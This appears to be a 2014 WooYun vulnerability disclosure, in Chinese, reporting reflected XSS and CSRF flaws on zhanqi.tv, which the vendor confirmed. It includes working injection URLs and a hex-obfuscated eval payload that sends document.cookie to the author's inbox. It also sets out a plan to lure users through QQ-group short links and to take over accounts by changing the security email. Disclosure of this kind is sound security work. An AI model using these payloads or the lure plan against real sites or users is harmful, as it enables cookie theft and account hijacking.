边锋某产品多处反射型xss+csrf攻击（利用站内信收cookie）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066242

漏洞标题：边锋某产品多处反射型xss+csrf攻击（利用站内信收cookie）

漏洞作者：发条橙子

提交时间：2014-06-26 11:05

修复时间：2014-08-10 11:06

公开时间：2014-08-10 11:06

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-26：细节已通知厂商并且等待厂商处理中
2014-06-30：厂商已经确认，细节仅向厂商公开
2014-07-10：细节向核心白帽子及相关领域专家公开
2014-07-20：细节向普通白帽子公开
2014-07-30：细节向实习白帽子公开
2014-08-10：细节向公众公开

简要描述：

两处反射xss,可以导致csrf攻击。

详细说明：

反射xxs#1 http://www.zhanqi.tv/u/login?redirect_on_login=xxx
redirect_on_login参数带入<script></script>
反射xxs#2
http://www.zhanqi.tv/game/6?ref=xxx
ref参数带入<script></script>
并且对参数过滤不严，可以轻易构造playload.

http://www.zhanqi.tv/game/6?ref=%27;alert('fob');'

下面针对本产品做下简单的攻击思路（验证通过）:
1.核心的session做了httponly,但是别的session没做，可以考虑打cookies
2.用户后台有个人资料维护、站内短信等功能。
我这边验证的一个简单思路(用户要处于登陆状态，主要利用csrf)
A：
第一步:构造playload，利用站内信功能，发送相关用户信息(如用户名、安全邮箱、cookies)到我的站内信中。
简单的将cookies发送到指定站内信的playload

http://www.zhanqi.tv/game/6?ref=%27;v=%27\x79\x70\x2e\x61\x6a\x61\x78\x28\x27\x2f\x75\x2f\x6d\x65\x73\x73\x61\x67\x65\x2f\x73\x65\x6e\x64\x27\x2c\x20\x7b\x64\x61\x74\x61\x3a\x20\x7b\x20\x72\x65\x63\x65\x69\x76\x65\x72\x3a\x27\x67\x61\x6e\x62\x61\x69\x62\x61\x69\x27\x2c\x73\x75\x62\x6a\x65\x63\x74\x3a\x27\x61\x27\x2c\x62\x6f\x64\x79\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x7d\x2c\x20\x74\x79\x70\x65\x3a\x20\x27\x70\x6f\x73\x74\x27\x2c\x20\x64\x61\x74\x61\x54\x79\x70\x65\x3a\x20\x27\x6a\x73\x6f\x6e\x27\x7d\x29\x3b%27;eval(v);'

第二步:去用户QQ群等发送短网址，诱惑或者嘲讽用户点击

http://t.cn/RvHlPp9

。
第三步:利用这些信息进行攻击，也可以构造playload，对用户安全邮箱进行修改，
然后通过找回密码功能修改用户密码，劫持用户账户。
漏洞虽小但是危害还是很大的，几乎后台功能都可以直接csrf操作，比如恶搞修改用户昵称等。后台功能基本都是ajax形式实现，利用产品自带的jquery可以轻松实现。
例如发送私信：

$.post("/u/message/send",{ receiver:'ganbaibai',subject:'a',body:document.cookie})

漏洞证明：

站内信收到cookies

修改用户信息无密码验证

修复方案：

针对xss，只能过滤+过滤。
针对后台功能逻辑，还是需要进行安全性校验的。

版权声明：转载请注明来源发条橙子@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-06-30 10:15

厂商回复：

漏洞确实存在，谢谢橙子，马上处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066242

漏洞标题：边锋某产品多处反射型xss+csrf攻击（利用站内信收cookie）

相关厂商：边锋网络

漏洞作者：发条橙子

提交时间：2014-06-26 11:05

修复时间：2014-08-10 11:06

公开时间：2014-08-10 11:06

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源发条橙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-066242

漏洞标题：边锋某产品多处反射型xss+csrf攻击（利用站内信收cookie）

相关厂商：边锋网络

漏洞作者： 发条橙子

提交时间：2014-06-26 11:05

修复时间：2014-08-10 11:06

公开时间：2014-08-10 11:06

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-066242"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 发条橙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：发条橙子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源发条橙子@乌云